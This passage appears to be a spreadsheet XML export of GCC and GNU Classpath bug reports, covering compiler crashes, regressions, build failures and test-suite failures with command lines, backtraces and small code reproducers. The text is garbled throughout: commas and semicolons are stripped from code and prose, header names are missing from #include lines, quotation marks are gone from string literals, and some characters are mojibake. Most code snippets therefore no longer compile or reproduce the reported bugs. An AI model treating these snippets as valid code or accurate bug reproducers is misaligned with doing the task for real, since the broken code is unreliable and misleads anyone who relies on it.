(debug_insn 8390 8396 8395 5 (var_location:DI D#142 (reg/f:DI 1243 [ ivtmp.961 ])) -1
     (nil))
This occurs when compiling chgpen.fppized.f (attached) with the following minimal set of options:
&gt; /home/wschmidt/gcc/install/gcc-mainline-base/libexec/gcc/powerpc64-linux/4.7.0/f951 chgpen.fppized.f -g -O3 -fprofile-generate -ffast-math -funroll-loops -o chgpen.fppized.s</t>
  </si>
  <si>
    <t>GCC-65923</t>
  </si>
  <si>
    <t>False positive for warning about literal operator suffix and using</t>
  </si>
  <si>
    <t>In the following snippet a warning is given when bringing a chrono literal into the global namespace explicity but not when importing all literals. Looks like the warning shouldn't be there since the two do the same thing and using directives are the way to go with literal operators.
cat /tmp/tmp.cc:
#include 
using std::literals::chrono_literals::operators  // warning here
using std::literals  // no warning here
/usr/local/gcc49/bin/g++ -c -std=c++14 /tmp/tmp.cc:
/tmp/tmp.cc:4:47: warning: literal operator suffixes not preceded by â€˜_â€™ are reserved for future standardization
 using std::literals::chrono_literals::operators  // warning here</t>
  </si>
  <si>
    <t>GCC-54611</t>
  </si>
  <si>
    <t>[4.8 regression] Bootstrap failure:  conflicting types for 'backtrace_simple'</t>
  </si>
  <si>
    <t>This is on i386-unknown-freebsd10.0:
/scratch2/tmp/gerald/gcc-HEAD/libbacktrace/nounwind.c:48: warning: no previous p
rototype for 'backtrace'
/scratch2/tmp/gerald/gcc-HEAD/libbacktrace/nounwind.c:59: error: conflicting typ
es for 'backtrace_simple'
/scratch2/tmp/gerald/gcc-HEAD/libbacktrace/backtrace.h:130: error: previous decl
aration of 'backtrace_simple' was here
gmake[4]: *** [nounwind.lo] Error 1
gmake[4]: Leaving directory `/scratch2/tmp/gerald/OBJ-0917-1906/libbacktrace'
gmake[3]: *** [all] Error 2
gmake[3]: Leaving directory `/scratch2/tmp/gerald/OBJ-0917-1906/libbacktrace'
gmake[2]: *** [all-stage1-libbacktrace] Error 2 
gmake[2]: Leaving directory `/scratch2/tmp/gerald/OBJ-0917-1906' 
gmake[1]: *** [stage1-bubble] Error 2 
gmake[1]: Leaving directory `/scratch2/tmp/gerald/OBJ-0917-1906'
gmakr: *** [bootstrap-lean] Error 2</t>
  </si>
  <si>
    <t>GCC-40281</t>
  </si>
  <si>
    <t>[4.4 Regression] -fprefetch-loop-arrays: ICE: in initialize_matrix_A at tree-data-ref.c:1887</t>
  </si>
  <si>
    <t>for the testcase to be attached (what about enhancing bugzilla with an option to attach files at initial submit time?)
gfortran -v -c -O2  -funroll-loops -fprefetch-loop-arrays test.f90
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /data03/vondele/gcc_trunk/gcc/configure --prefix=/data03/vondele/gcc_trunk/build --enable-languages=cc++fortran --disable-multilib --with-ppl=/data03/vondele/gcc_trunk/build/ --with-cloog=/data03/vondele/gcc_trunk/build/
Thread model: posix
gcc version 4.5.0 20090527 (experimental) [trunk revision 147915] (GCC)
COLLECT_GCC_OPTIONS='-v' '-c' '-O2' '-funroll-loops' '-fprefetch-loop-arrays' '-mtune=generic'
 /data03/vondele/gcc_trunk/build/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/f951 test.f90 -quiet -dumpbase test.f90 -mtune=generic -auxbase test -O2 -version -funroll-loops -fprefetch-loop-arrays -fintrinsic-modules-path /data03/vondele/gcc_trunk/build/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/finclude -o /tmp/ccDzkBkL.s
GNU Fortran (GCC) version 4.5.0 20090527 (experimental) [trunk revision 147915] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.5.0 20090527 (experimental) [trunk revision 147915] GMP version 4.2.2 MPFR version 2.3.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU Fortran (GCC) version 4.5.0 20090527 (experimental) [trunk revision 147915] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.5.0 20090527 (experimental) [trunk revision 147915] GMP version 4.2.2 MPFR version 2.3.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
test.f90: In function â€˜makedcoulâ€™:
test.f90:7: internal compiler error: in initialize_matrix_A at tree-data-ref.c:1887
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6126</t>
  </si>
  <si>
    <t>[Tru64 5.1] doesn't expose stat(2) as a function</t>
  </si>
  <si>
    <t>Under Tru64 5.1 stat is defined as a macro but is not exposed as a
function except to the DEC C compiler.  The header file uses
	#pragma extern_prefix _F64_
to map stat to the function _F64_stat but only if DECC is defined.
My question is is this something that can or should be fixed by
fixincludes or should I just complain to the vendor about it?
Thanks.
Release:
3.0.3
Environment:
System: OSF1 gskc01 V5.1 732 alpha
Machine: alpha
host: alpha-dec-osf5.1
build: alpha-dec-osf5.1
target: alpha-dec-osf5.1
configured with: ../gcc-3.0.3/configure
How-To-Repeat:
/* this will fail to compile */
/* tru64-stat-bug.c:9: `stat' undeclared (first use in this function) */
#include 
#include 
#include 
int main() {
  printf(%p\n 
  return 0
}</t>
  </si>
  <si>
    <t>mkc</t>
  </si>
  <si>
    <t>CLASSPATH-32094</t>
  </si>
  <si>
    <t>cvs-2006-5-26 build error</t>
  </si>
  <si>
    <t>1756. ERROR in ../java/util/EnumMap.java (at line 391)
	return new EnumMap(this)
	       ^^^^^^^^^^^^^^^^^
The constructor EnumMap(EnumMap) is ambiguous
6194. ERROR in ../external/jsr166/java/util/concurrent/ConcurrentSkipListSet.java (at line 133)
	clone.setMap(new ConcurrentSkipListMap(m))
	             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The constructor ConcurrentSkipListMap(Map) is ambiguous</t>
  </si>
  <si>
    <t>hys545</t>
  </si>
  <si>
    <t>GCC-6152</t>
  </si>
  <si>
    <t>Bug#75773: Info received and FILED only</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 75773-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was pending/6132: Bug#75773: Info received and FILED only)</t>
  </si>
  <si>
    <t>75773-quiet</t>
  </si>
  <si>
    <t>GCC-25636</t>
  </si>
  <si>
    <t>[4.2 Regression] opts.c is being miscompiled write to read only memory</t>
  </si>
  <si>
    <t>I just downloaded and compiled gcc-4.2-20051231 with 
  ./configure --prefix=/opt/gcc42
  make
  make install (root)
after setting LD_LIBRARY_PATH to /opt/gcc42/lib
$ /opt/gcc42/bin/gcc --version
gcc (GCC) 4.2.0 20051231 (experimental)
Copyright (C) 2005 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ /opt/gcc42/bin/gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ./configure --prefix=/opt/gcc42
Thread model: posix
gcc version 4.2.0 20051231 (experimental)
$ /opt/gcc42/libexec/gcc/i686-pc-linux-gnu/4.2.0/cc1 --help
The following options are language-independent:
cc1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ /opt/gcc42/libexec/gcc/i686-pc-linux-gnu/4.2.0/cc1plus --help
The following options are language-independent:
cc1plus: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
From gdb
$ gdb /opt/gcc42/libexec/gcc/i686-pc-linux-gnu/4.2.0/cc1
GNU gdb Red Hat Linux (6.3.0.0-1.84rh)
Copyright 2004 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i386-redhat-linux-gnu...Using host libthread_db library /lib/libthread_db.so.1.
(gdb) r --help
Starting program: /opt/gcc42/libexec/gcc/i686-pc-linux-gnu/4.2.0/cc1 --help
Reading symbols from shared object read from target memory...done.
Loaded system supplied DSO at 0x82f000
The following options are language-independent:
Program received signal SIGSEGV Segmentation fault.
0x083580bd in print_filtered_help (flag=536870912) at ../.././gcc/opts.c:1301
1301          memset (printed 0 cl_options_count)
(gdb) bt
#0  0x083580bd in print_filtered_help (flag=536870912) at ../.././gcc/opts.c:1301
#1  0x08358f53 in decode_options (argc=2 argv=0xbf830644) at ../.././gcc/opts.c:1250
#2  0x083bf9b0 in toplev_main (argc=2 argv=0xbf830644) at ../.././gcc/toplev.c:1974
#3  0x080b8e6f in main (argc=0 argv=0x259) at ../.././gcc/main.c:35
I'm using Fedore Core 4 with all updates
bye
  freddy77</t>
  </si>
  <si>
    <t>freddyz77</t>
  </si>
  <si>
    <t>GCC-40140</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE with -ftree-parallelize-loops</t>
  </si>
  <si>
    <t>The attached valid code snippet triggers an ICE on the trunk when compiled with
-O2 -ftree-parallelize-loops=2:
g++: Internal error: Segmentation fault (program cc1plus)
Please submit a full bug report. [etc.]</t>
  </si>
  <si>
    <t>GCC-1357</t>
  </si>
  <si>
    <t>no result execution with W98 and last Cygwin tools</t>
  </si>
  <si>
    <t xml:space="preserve">        I just download the last version of cygwin with W98 on a new computer. What a nice set of tools!! Everything seems to work fine.
        I attempt to use gcj. My last try is made with:
libgcj-2.95.1-win32-0.3.tar.bz2 libgcj.spec and Helloworld.java (Test.java) downloaded from http://www.cs.bris.ac.uk/~jb7216/libgcj/
Install and compile :
bunzip2 -c libgcj-2.95.1-win32-0.3.tar.bz2 | tar xfv -
export LIBRARY_PATH=$LIBRARY_PATH:/usr/local/lib
export CLASSPATH=/usr/local/share/libgcj.zip
libgcj file :
#
# This spec file is read by gcj when linking.
# It is used to specify the standard libraries we need in order
# to link with libgcj.
#
*lib: -lgcj -lm -lzgcj -lgcgcj -lmingw32  -lgccgcj   -lcrtdll -lwsock32 -luser32 -lkernel32 
*libgcc: %{}
*jc1:  
#
# libgcc should really be a shared library.  This is a design flaw
# that causes no end of mysterious problems.  If we are using the
# GNU linker force parts of libgcc into the program file rather
# than picking bits up from various shared libraries.
#
%rename startfile startfileorig
*startfile: %(startfileorig) -u data_start -lgcjdata -u __rethrow -lgcc
$ cat Test.java
public class Test {
        public static void main(String[] args) {
                System.out.println(Hello world)
        }
}
gcj -mno-cygwin --main=Test -o Test Test.java
All seems to be OK .
When execute the result:
Windows Box : Abnormal termination program ... 
TEST a cause une defaillance de page dans (page default ...)
 le module CYGWIN1.DLL Ã  0167:610011a3.
Registres :
EAX=00000000 CS=0167 EIP=610011a3 EFLGS=00010202
EBX=00000004 SS=016f ESP=0287fdd0 EBP=0287fdd8
ECX=00000001 DS=016f ESI=00000000 FS=4cb7
EDX=00000000 ES=016f EDI=00000000 GS=0000
Octets Ã  CS : EIP :
8b 13 85 d2 75 f7 83 eb 04 39 f3 76 0b 8b 03 83 
Etat de la pile : (stack)
00850560 8175a250 0287fdf8 61002924 00000000 00000000 7fc0100c 0040101f 00470000 00470004 0287fe08 00401347 8175a250 00850060 0287fe28 004011e1 
The program is very big isnt'it?
 ls -l
otal 3771
rwxr-xr-x   1 standard unknown   3839385 Aug 23 17:19 Test.exe
rw-r--r--   1 standard unknown       210 Aug 23 17:18 Test.java
Without -mno-cygwin option nothing is printed after execute.
Somebody can help me? 
Thanks a lot
Release:
unknown
Environment:
W98 cygwin and gcj</t>
  </si>
  <si>
    <t>cormier</t>
  </si>
  <si>
    <t>GCC-34472</t>
  </si>
  <si>
    <t>[4.3 Regression] gcc.dg/struct/wo_prof_malloc_size_var.c doesn't work</t>
  </si>
  <si>
    <t>On Linux/Intel64 I got
 /export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/struct/wo_prof_malloc_size_var.c   -O3 -fipa-struct-reorg -fdump-ipa-all -fwhole-program -combine -fipa-type-escape -fno-show-column  -lm   -o ./wo_prof_malloc_size_var.exe    (timeout = 300)
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/struct/wo_prof_malloc_size_var.c:32: internal compiler error: Segmentation fault^M
Please submit a full bug report^M
with preprocessed source if appropriate.^M
See  for instructions.^M
compiler exited with status 1</t>
  </si>
  <si>
    <t>GCC-65121</t>
  </si>
  <si>
    <t>[5 regression] long_call attribute broken weak symbol arm*</t>
  </si>
  <si>
    <t>Patch r220684 changed behaviour of varasm.c:default_binds_local_p which affected 
behavior of gcc/config/arm/arm.c:arm_function_in_section_p and through it
breaks gcc/config/arm/arm.c:arm_is_long_call_p for weak symbols.
As a result I get regression for gcc.target/arm/long-calls-1.c on
arm-none-eabi:
FAIL: gcc.target/arm/long-calls-1.c scan-assembler-not \tbl?\tweak_l1\n
FAIL: gcc.target/arm/long-calls-1.c scan-assembler-not \tbl?\tweak_l3\n
Corresponding mailing thread:
https://gcc.gnu.org/ml/gcc-patches/2015-02/msg01114.html</t>
  </si>
  <si>
    <t>Alex.Velenko</t>
  </si>
  <si>
    <t>GCC-27611</t>
  </si>
  <si>
    <t>FAIL: g++.dg/other/unused1.C scan-assembler string\tclass2 and string\tprinter</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.2/objdir/gcc/testsuite/g++/../../g++ -B/home
/dave/gcc-4.2/objdir/gcc/testsuite/g++/../../ /home/dave/gcc-4.2/gcc/gcc/testsui
te/g++.dg/other/unused1.C  -nostdinc++ -I/home/dave/gcc-4.2/objdir/hppa-linux/li
bstdc++-v3/include/hppa-linux -I/home/dave/gcc-4.2/objdir/hppa-linux/libstdc++-v
3/include -I/home/dave/gcc-4.2/gcc/libstdc++-v3/libsupc++ -I/home/dave/gcc-4.2/g
cc/libstdc++-v3/include/backward -I/home/dave/gcc-4.2/gcc/libstdc++-v3/testsuite
 -fmessage-length=0  -g  -S  -o unused1.s    (timeout = 300)
PASS: g++.dg/other/unused1.C (test for excess errors)
PASS: g++.dg/other/unused1.C scan-assembler foo
PASS: g++.dg/other/unused1.C scan-assembler boo
PASS: g++.dg/other/unused1.C scan-assembler cue
FAIL: g++.dg/other/unused1.C scan-assembler string\tclass2
FAIL: g++.dg/other/unused1.C scan-assembler string\tprinter</t>
  </si>
  <si>
    <t>GCC-15329</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] ICE on constructor of member template</t>
  </si>
  <si>
    <t>This code produces an ICE with g++-3.4.0
class Canvas
{
public:
  typedef void (Canvas::* Manip)()
  template 
  class Saver
  {
  public:
    Saver(Canvas&amp; canvas) :
      itsCanvas(canvas)
    {
      (itsCanvas.*doit)() // ICE occurs here no ICE if 'canvas' is used
instead of 'itsCanvas'
    }
  private:
    Canvas
  }
}
Specs:
[sideswipe 18:20 52]$ /usr/local/gcc-3.4.0/bin/g++ -v
Reading specs from /usr/local/gcc-3.4.0/lib/gcc/i686-pc-linux-gnu/3.4.0/specs
Configured with: /home/rjpeters/build/gcc-3.4.0/configure
--prefix=/usr/local/gcc-3.4.0 --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.4.0
There is no ICE with g++-3.3.2 for the same code and as far as I can recall
there has been no problem with this same code as I upgraded through all
successive versions including 3.1.x 3.2.x and 3.3.x.
There is no ICE if the problem line uses the function argument 'canvas' rather
than the member variable 'itsCanvas' as the callee of the ptr-to-memfunc.
There is no ICE if the problem line is changed to a direct member-function call
rather than a call through a ptr-to-memfunc and in this case the nested class is
not a template class:
class Canvas
{
public:
  void foo()
  class Saver
  {
  public:
    Saver(Canvas&amp; canvas) :
      itsCanvas(canvas)
    {
      itsCanvas.foo() // no ICE here in this case
    }
  private:
    Canvas
  }
}
-Rob Peters</t>
  </si>
  <si>
    <t>rjpcal</t>
  </si>
  <si>
    <t>GCC-81691</t>
  </si>
  <si>
    <t>libgomp.fortran/target2.f90 fails for nvptx at -O0 and -O1</t>
  </si>
  <si>
    <t>The test fails as follows:
...
Executing on nvidia-1-serial: ./target2.exe    (timeout = 300)
'./target2.exe' echo XYZ$?ZYX
libgomp: cuCtxSynchronize error: an illegal memory access was encountered
libgomp: cuMemFreeHost error: an illegal memory access was encountered
libgomp: device finalization failed
XYZ1ZYX
OK&gt;
Elapsed time: 555 ms
FAIL: libgomp.fortran/target2.f90   -O1  execution test
...</t>
  </si>
  <si>
    <t>GCC-15812</t>
  </si>
  <si>
    <t>[4.0 Regression] boehm-gc test fails on several targets</t>
  </si>
  <si>
    <t>Boehm gctest fails to run on several targets.
My targets here: darwin 7.4.0 ppclinux and sparc-sun-solaris2.9 (32/64bit) fail
with a seg fault.
Further details on request but I feel it is reproduciable.
Also a make check in boehm-gc leads to an undefined @LDFLAGS@ if one does try
to run it outside the make -k check.
Deleteing the @LDFLAGS@ makes it link and core cump :(</t>
  </si>
  <si>
    <t>GCC-58972</t>
  </si>
  <si>
    <t>Lambda can't access private members</t>
  </si>
  <si>
    <t>Hi all
Again this problem report might be bogus.  IANALL and reading the proposed standard did not really help me understand if the problem is in the compiler or in the eye of the beholder.
Anyway I think that if this is not a problem of G++ it is one of C++.  At least Clang++ (3.4) accepts it.
$ cat foo.cc
class base
{
protected:
  using type = int
}
template 
class derive: public base
{
  using typename base::type
public:
  void foo(type a)
  {
    auto f = [a](type x){ return x == a }
    f(32)
  }
}
int main()
{
  derive d
  d.foo(23)
}
$ clang++-mp-3.4 -std=c++11 foo.cc
$ g++-mp-4.9 --version
g++-mp-4.9 (MacPorts gcc49 4.9-20130915_0) 4.9.0 20130915 (experimental)
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ g++-mp-4.9 -std=c++11 foo.cc
foo.cc: In instantiation of 'struct derive::foo(base::type) [with T = char base::type = int]::':
foo.cc:14:42:   required from 'void derive::foo(base::type) [with T = char base::type = int]'
foo.cc:22:11:   required from here
foo.cc:4:19: error: 'using type = int' is protected
   using type = int
                   ^
foo.cc:14:18: error: within this context
     auto f = [a](type x){ return x == a }
                  ^
$ g++-mp-4.8 --version
g++-mp-4.8 (MacPorts gcc48 4.8.1_3) 4.8.1
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ g++-mp-4.8 -std=c++11 foo.cc
foo.cc: In instantiation of 'struct derive::foo(base::type) [with T = char base::type = int]::__lambda0':
foo.cc:14:42:   required from 'void derive::foo(base::type) [with T = char base::type = int]'
foo.cc:22:11:   required from here
foo.cc:4:19: error: 'using type = int' is protected
   using type = int
                   ^
foo.cc:14:18: error: within this context
     auto f = [a](type x){ return x == a }
                  ^
FWIW if derived is no longer template it works.
BTW someone should have a look at this: http://stackoverflow.com/questions/11933999/why-is-it-not-possible-to-use-private-method-in-a-lambda (and especially http://ideone.com/DJezf).  Maybe it's the same issue maybe it's slightly different but again clang++ eats it.</t>
  </si>
  <si>
    <t>GCC-70852</t>
  </si>
  <si>
    <t>ice in warn_for_memset</t>
  </si>
  <si>
    <t>Created attachment 38366
C source code
The attached C code when compiled by gcc trunk dated 20160428 does this
/home/dcb/rpmbuild/BUILD/allegro-4.4.2/addons/jpgalleg/src/decode.c:1054:2: internal compiler error: Segmentation fault
  memset(_jpeg_huffman_dc_table 0 4 * sizeof(HUFFMAN_TABLE))
  ^~~~~~
0xc438df crash_signal
	../../src/trunk/gcc/toplev.c:333
0x6ed3da tree_class_check(tree_node* tree_code_class char const* int char const*)
	../../src/trunk/gcc/tree.h:3147
0x6ed3da warn_for_memset(unsigned int tree_node* tree_node* int)
	../../src/trunk/gcc/c-family/c-common.c:11800
0x69cc49 c_parser_postfix_expression_after_primary
	../../src/trunk/gcc/c/c-parser.c:8301</t>
  </si>
  <si>
    <t>GCC-1239</t>
  </si>
  <si>
    <t>Internal compiler failure in find_basic_blocks_1</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;analyzed
State-Changed-Why: This seems to be a transient bug most likely with the
    gcc middle and/or back end. I can't reproduce it with a
    `jc1' built of the current CVS tree. Can you confirm this?
</t>
  </si>
  <si>
    <t>GCC-57038</t>
  </si>
  <si>
    <t>Latest libreoffice compilation fails with enabled LTO</t>
  </si>
  <si>
    <t>Libreoffice git repository commit:
04a54e7180c2cf9f4855211055ecbc6a41deff56 (Apr 17)
Libreoffice comfigure options:
./autogen.sh --with-parallelism=1 --without-junit --enable-mergelibs --enable-lto
gcc --version:
gcc (GCC) 4.9.0 20130420 (experimental)
failure:
/usr/bin/make -j 1 -rs -f /home/marxin/Programming/libreoffice/Makefile.gbuild
[build LNK] Library/libcomphelpgcc3.so
lto1: internal compiler error: in add_symbol_to_partition_1 at lto/lto-partition.c:186
0x5180d5 add_symbol_to_partition_1
	../../gcc/lto/lto-partition.c:185
0x51881a lto_balanced_map()
	../../gcc/lto/lto-partition.c:532
0x514f3c do_whole_program_analysis
	../../gcc/lto/lto.c:3245
0x514f3c lto_main()
	../../gcc/lto/lto.c:3385
Command line:
S=/home/marxin/Programming/libreoffice &amp;&amp; O=$S/solver/unxlngx6.pro &amp;&amp; W=$S/workdir/unxlngx6.pro &amp;&amp;  mkdir -p $W/LinkTarget/Library/ &amp;&amp; /usr/bin/ccache g++ -shared -Wl-znoexecstack -flto -fuse-linker-plugin -O2   -Wl-zorigin '-Wl-rpath$ORIGIN:$ORIGIN/../ure-link/lib' -Wl-rpath-link$O/lib -Wl-zdefs  -Wl-rpath-link/lib:/usr/lib -Wl-zcombreloc -L$O/lib  -Wl--hash-style=gnu  -Wl--dynamic-list-cpp-new -Wl--dynamic-list-cpp-typeinfo -Wl-Bsymbolic-functions  -Wl-O1 -Wl-S  $W/CxxObject/comphelper/source/compare/AnyCompareFactory.o $W/CxxObject/comphelper/source/container/IndexedPropertyValuesContainer.o $W/CxxObject/comphelper/source/container/NamedPropertyValuesContainer.o $W/CxxObject/comphelper/source/container/container.o $W/CxxObject/comphelper/source/container/containermultiplexer.o $W/CxxObject/comphelper/source/container/embeddedobjectcontainer.o $W/CxxObject/comphelper/source/container/enumerablemap.o $W/CxxObject/comphelper/source/container/enumhelper.o $W/CxxObject/comphelper/source/container/namecontainer.o $W/CxxObject/comphelper/source/eventattachermgr/eventattachermgr.o $W/CxxObject/comphelper/source/misc/accessiblecomponenthelper.o $W/CxxObject/comphelper/source/misc/accessiblecontexthelper.o $W/CxxObject/comphelper/source/misc/accessibleeventnotifier.o $W/CxxObject/comphelper/source/misc/accessiblekeybindinghelper.o $W/CxxObject/comphelper/source/misc/accessibleselectionhelper.o $W/CxxObject/comphelper/source/misc/accessibletexthelper.o $W/CxxObject/comphelper/source/misc/accessiblewrapper.o $W/CxxObject/comphelper/source/misc/accimplaccess.o $W/CxxObject/comphelper/source/misc/anytostring.o $W/CxxObject/comphelper/source/misc/asyncnotification.o $W/CxxObject/comphelper/source/misc/comphelper_module.o $W/CxxObject/comphelper/source/misc/comphelper_services.o $W/CxxObject/comphelper/source/misc/componentbase.o $W/CxxObject/comphelper/source/misc/componentcontext.o $W/CxxObject/comphelper/source/misc/componentmodule.o $W/CxxObject/comphelper/source/misc/configuration.o $W/CxxObject/comphelper/source/misc/configurationhelper.o $W/CxxObject/comphelper/source/misc/docpasswordhelper.o $W/CxxObject/comphelper/source/misc/docpasswordrequest.o $W/CxxObject/comphelper/source/misc/documentinfo.o $W/CxxObject/comphelper/source/misc/documentiologring.o $W/CxxObject/comphelper/source/misc/evtlistenerhlp.o $W/CxxObject/comphelper/source/misc/evtmethodhelper.o $W/CxxObject/comphelper/source/misc/ihwrapnofilter.o $W/CxxObject/comphelper/source/misc/instancelocker.o $W/CxxObject/comphelper/source/misc/interaction.o $W/CxxObject/comphelper/source/misc/listenernotification.o $W/CxxObject/comphelper/source/misc/logging.o $W/CxxObject/comphelper/source/misc/mediadescriptor.o $W/CxxObject/comphelper/source/misc/mime^Cnfighelper.o $W/CxxObject/comphelper/source/misc/namedvaluecollection.o $W/CxxObject/comphelper/source/misc/numberedcollection.o $W/CxxObject/comphelper/source/misc/numbers.o $W/CxxObject/comphelper/source/misc/officeresourcebundle.o $W/CxxObject/comphelper/source/misc/officerestartmanager.o $W/CxxObject/comphelper/source/misc/proxyaggregation.o $W/CxxObject/comphelper/source/misc/scopeguard.o $W/CxxObject/comphelper/source/misc/SelectionMultiplex.o $W/CxxObject/comphelper/source/misc/sequenceashashmap.o $W/CxxObject/comphelper/source/misc/sequence.o $W/CxxObject/comphelper/source/misc/servicedecl.o $W/CxxObject/comphelper/source/misc/serviceinfohelper.o $W/CxxObject/comphelper/source/misc/sharedmutex.o $W/CxxObject/comphelper/source/misc/stillreadwriteinteraction.o $W/CxxObject/comphelper/source/misc/anycompare.o $W/CxxObject/comphelper/source/misc/storagehelper.o $W/CxxObject/comphelper/source/misc/string.o $W/CxxObject/comphelper/source/misc/synchronousdispatch.o $W/CxxObject/comphelper/source/misc/syntaxhighlight.o $W/CxxObject/comphelper/source/misc/types.o $W/CxxObject/comphelper/source/misc/weak.o $W/CxxObject/comphelper/source/misc/weakeventlistener.o $W/CxxObject/comphelper/source/officeinstdir/officeinstallationdirectories.o $W/CxxObject/comphelper/source/processfactory/processfactory.o $W/CxxObject/comphelper/source/property/ChainablePropertySet.o $W/CxxObject/comphelper/source/property/ChainablePropertySetInfo.o $W/CxxObject/comphelper/source/property/genericpropertyset.o $W/CxxObject/comphelper/source/property/MasterPropertySet.o $W/CxxObject/comphelper/source/property/MasterPropertySetInfo.o $W/CxxObject/comphelper/source/property/opropertybag.o $W/CxxObject/comphelper/source/property/propagg.o $W/CxxObject/comphelper/source/property/propertybag.o $W/CxxObject/comphelper/source/property/propertycontainer.o $W/CxxObject/comphelper/source/property/propertycontainerhelper.o $W/CxxObject/comphelper/source/property/property.o $W/CxxObject/comphelper/source/property/propertysethelper.o $W/CxxObject/comphelper/source/property/propertysetinfo.o $W/CxxObject/comphelper/source/property/propertystatecontainer.o $W/CxxObject/comphelper/source/property/propmultiplex.o $W/CxxObject/comphelper/source/property/propstate.o $W/CxxObject/comphelper/source/property/TypeGeneration.o $W/CxxObject/comphelper/source/streaming/basicio.o $W/CxxObject/comphelper/source/streaming/memorystream.o $W/CxxObject/comphelper/source/streaming/oslfile2streamwrap.o $W/CxxObject/comphelper/source/streaming/seekableinput.o $W/CxxObject/comphelper/source/streaming/seqinputstreamserv.o $W/CxxObject/comphelper/source/streaming/seqoutputstreamserv.o $W/CxxObject/comphelper/source/streaming/seqstream.o $W/CxxObject/comphelper/source/streaming/streamsection.o $W/CxxObject/comphelper/source/xml/attributelist.o $W/CxxObject/comphelper/source/xml/ofopxmlhelper.o $W/CxxObject/comphelper/source/xml/xmltools.o     -Wl--start-group  -Wl--end-group -Wl--no-as-needed   -licuuc -luno_cppu -luno_cppuhelpergcc3 -luno_sal -luno_salhelpergcc3 -lucbhelper4gcc3 -li18nlangtaggcc3 -o $W/LinkTarget/Library/libcomphelpgcc3.so</t>
  </si>
  <si>
    <t>GCC-4522</t>
  </si>
  <si>
    <t>Improperly set eofbit in __copy_streambufs</t>
  </si>
  <si>
    <t>The following code raises EOF for cout which is not correct:
  // foo.cc
  #include 
  #include 
  int
  main(int argc const char* argv[])
  {
    const char* data = first line # comment\n\
second line\n\
# commentary line\n\
last line\n
    std::istrstream iss(data)
    std::cout &lt;&lt; Original: &lt;&lt; std::endl &lt;&lt; iss.rdbuf()
    short state = std::cout.rdstate()
    std::cout.clear()
    std::cout &lt;&lt; flags:  &lt;&lt; std::hex &lt;&lt; state &lt;&lt; std::endl
  }
Release:
3.0.1
Environment:
System: SunOS max 5.8 Generic_108528-07 sun4u sparc SUNWSun-Blade-100
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.0.1/configure
How-To-Repeat:
Compiled using: g++ -g -o foo foo.cc</t>
  </si>
  <si>
    <t>howes</t>
  </si>
  <si>
    <t>GCC-42546</t>
  </si>
  <si>
    <t>ALLOCATED statement typo in the docs and for scalar variables</t>
  </si>
  <si>
    <t>As reported by James Van Buskirk
at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/3aad8fb30b5174f4
Part of the reported issue is PR 41872. Remaining issue is:
13.7.9 ALLOCATED (ARRAY) or ALLOCATED (SCALAR)
 [...]
 Arguments.
   ARRAY  shall be an allocatable array.
   SCALAR shall be an allocatable scalar.
Namely:
* ALLOCATABLE(SCALAR=) is not supported
* No ARRAY= is not rejected
* invoke.texi must be updated:
  - @var{X} is wrong it should be @var{ARRAY} and @var{SCALAR}
  - Standard version needs to be updated
 * * *
I was thinking of updating intrinsic.c's allocated by using two optional arguments: ARRAY (ar) and SCALAR (scalar) - and then doing the checking in check.c. However as the check routine does not get the actual argument but only -&gt;expr one can not distinguish
   ALLOCATABLE(scalar_var)  ! Valid first argument to check routine
and
   ALLOCATABLE(array=scalar_var) ! Invalid first argument to check routine
Otherwise one could use this method and use
  gfc_check_allocated (gfc_expr *array gfc_expr *scalar)
with checks for
  if (array == NULL &amp;&amp; scalar == NULL) // Missing argument
  if (array != NULL &amp;&amp; scalar != NULL) // Too many arguments
  if (scalar &amp;&amp; scalar-&gt;rank != 0) // Invalid: SCALAR + Array
However
  if (array &amp;&amp; array-&gt;rank == 0)
